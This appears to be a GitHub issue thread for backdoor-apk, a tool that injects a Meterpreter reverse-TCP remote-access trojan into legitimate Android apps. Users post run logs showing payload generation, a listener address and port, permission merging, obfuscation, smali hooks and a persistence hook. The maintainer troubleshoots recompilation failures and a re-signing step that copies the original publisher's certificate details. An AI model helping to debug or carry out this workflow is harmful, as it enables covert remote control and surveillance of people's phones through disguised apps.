### ISSUE TITLE
Failed recompiled original project

### ISSUE THREAD

**Issue by JoseluACT** [dana-at-cp/backdoor-apk#17]
Very good job!

Buy i have a problem, cant recompile the original project.

Run.log:

I: Using Apktool 2.1.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_7353023048509434537.tmp, p, --forced-package-id, 127, --min-sdk-version, 9, --target-sdk-version, 15, --version-code, 64, --version-name, 4.05.28, -F, /tmp/APKTOOL4873712124946363201.tmp, -0, arsc, -0, txt, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/res, -M, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:437)
	at brut.androlib.Androlib.buildResources(Androlib.java:371)
	at brut.androlib.Androlib.build(Androlib.java:281)
	at brut.androlib.Androlib.build(Androlib.java:254)
	at brut.apktool.Main.cmdBuild(Main.java:224)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_7353023048509434537.tmp, p, --forced-package-id, 127, --min-sdk-version, 9, --target-sdk-version, 15, --version-code, 64, --version-name, 4.05.28, -F, /tmp/APKTOOL4873712124946363201.tmp, -0, arsc, -0, txt, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/res, -M, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:436)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:423)
	... 5 more
Caused by: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_7353023048509434537.tmp, p, --forced-package-id, 127, --min-sdk-version, 9, --target-sdk-version, 15, --version-code, 64, --version-name, 4.05.28, -F, /tmp/APKTOOL4873712124946363201.tmp, -0, arsc, -0, txt, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/res, -M, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:97)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:430)
	... 6 more
Caused by: java.io.IOException: Cannot run program "/tmp/brut_util_Jar_7353023048509434537.tmp": error=2, No existe el fichero o el directorio
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1047)
	at brut.util.OS.exec(OS.java:90)
	... 7 more
Caused by: java.io.IOException: error=2, No existe el fichero o el directorio
	at java.lang.UNIXProcess.forkAndExec(Native Method)
	at java.lang.UNIXProcess.<init>(UNIXProcess.java:187)
	at java.lang.ProcessImpl.start(ProcessImpl.java:130)
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1028)
	... 8 more
Forcing cleanup due to a failure or error state!

I'm on Kali 2016.Can you help me?

Thanks you!

**Comment by JoseluACT** [comment]
I have tried with severals apks. For example: http://marcacom.uptodown.com/android/descargar

Thanks!
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/338705/run.log.tar.gz)

**Comment by dana-at-cp** [comment]
Try to decompile and recompile the APK, outside of backdoor-apk, using Apktool alone. Let me know the results.

**Comment by JoseluACT** [comment]
No problem to decompile:

I: Using Apktool 2.1.1 on marca-com-5-11-25.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

**Comment by dana-at-cp** [comment]
As I suspected, this is likely a problem with the original APK. Grab a known good APK from a reputable publisher and see if the "problems" go away. For example, I use AdobeReader.apk often in my testing.

**Comment by JoseluACT** [comment]
The same problem with adobeReader.apk with both branches:

On Kali 2016:

root@kaliAsus:~/Descargas/backdoor-apk-moar-sneaky/backdoor-apk# ./backdoor-apk.sh com.adobe.reader_v16.2-148266_Android-4.0.3.apk 
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

On Kali Sanna:

**Comment by dana-at-cp** [comment]
Hmm ... I am using Kali as well but not the Spanish version. :)

There is one other person reporting problems and I believe they are also using the Spanish version of Kali.

It's interesting that on Kali Sanna you get past the recompilation problem. On Kali Sanna you are failing precisely where the other Kali Sanna user is having trouble as well.

What is in the run.log file at the point of the signing failure?

**Comment by dana-at-cp** [comment]
FYI.

This is where I think the signing code is failing on Kali Sanna:

'''
orig_rsa_cert=`$UNZIP -l $ORIG_APK_FILE |grep ".RSA" |awk ' { print $4 } '`
dname=`$UNZIP -p $ORIG_APK_FILE $orig_rsa_cert |$KEYTOOL -printcert |grep "Owner:" |sed 's/Owner: //g'`
echo "dname value: $dname" >>$LOG_FILE 2>&1
'''

I suspect that on the Spanish version the string "Owner" might not be in the output of the keytool -printcert command.

Just a guess at this point but you could help confirm.

**Comment by JoseluACT** [comment]
This is the problem! I need change "Owner" by "Propietario" in backdoor-apk.sh. 

If i invoke keytool with Adobes's RSA:

"Propietario: CN=Adobe Systems Incorporated, OU=Adobe Reader, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US
Emisor: CN=Adobe Systems Incorporated, OU=Adobe Reader, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US
Número de serie: 4be060b7
Válido desde: Tue May 04 20:00:23 CEST 2010 hasta: Sat Sep 19 20:00:23 CEST 2037
Huellas digitales del Certificado:
	 MD5: 63:9D:68:63:CA:9D:3D:BB:BF:AD:49:36:6F:6B:7F:A5
	 SHA1: C0:7A:0B:5E:C6:F0:1A:57:89:C4:BB:F8:8A:83:03:60:51:4F:02:C5
	 SHA256: B6:DD:05:62:25:64:87:FC:D6:C9:8C:DE:13:78:58:EF:50:D9:AD:B9:F9:CD:2F:1C:A5:8C:53:57:EF:DF:0F:AF
	 Nombre del Algoritmo de Firma: SHA1withRSA
	 Versión: ### 3"

**Comment by Tirititelu** [comment]
Thank you! It's works!

**Comment by dana-at-cp** [comment]
Awesome!

Gracias por sus informes de errores.

Thank you for your interest in the project as well.

**Comment by hajerr51** [comment]
Same problem...
Failed to recompile original project with bacdoor "kali linux" .

**Comment by hajerr51** [comment]
Backdoor**

**Comment by securunder** [comment]
help my plz 
File: /root/backdoor-apk/backdoor-apk/original/smali/net/11/courses/d.smali
Target: "Invalid certificate"
Reg: v1
Shift count: 16
Shift tr value: [K-ZA-Jk-za-j]
Replacement: "16Sxfkvsn mobdspsmkdo"
Found launcher line in manifest file: 106
Activity lines found above launcher line: 1
Value of android_target_activity: 
Value of android_name: com/kiloo/unityutilities/UnityPluginActivity
The launcher line appears to be within an activity element
Value of tmp: com/kiloo/unityutilities/UnityPluginActivity
The smali file to hook: /root/backdoor-apk/backdoor-apk/original/smali_classes1000/com/kiloo/subwaysurfcom/kiloo/unityutilities/UnityPluginActivity.smali
Forcing cleanup due to a failure or error state!

**Comment by securunder** [comment]
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[!] Failed to locate smali file to hook
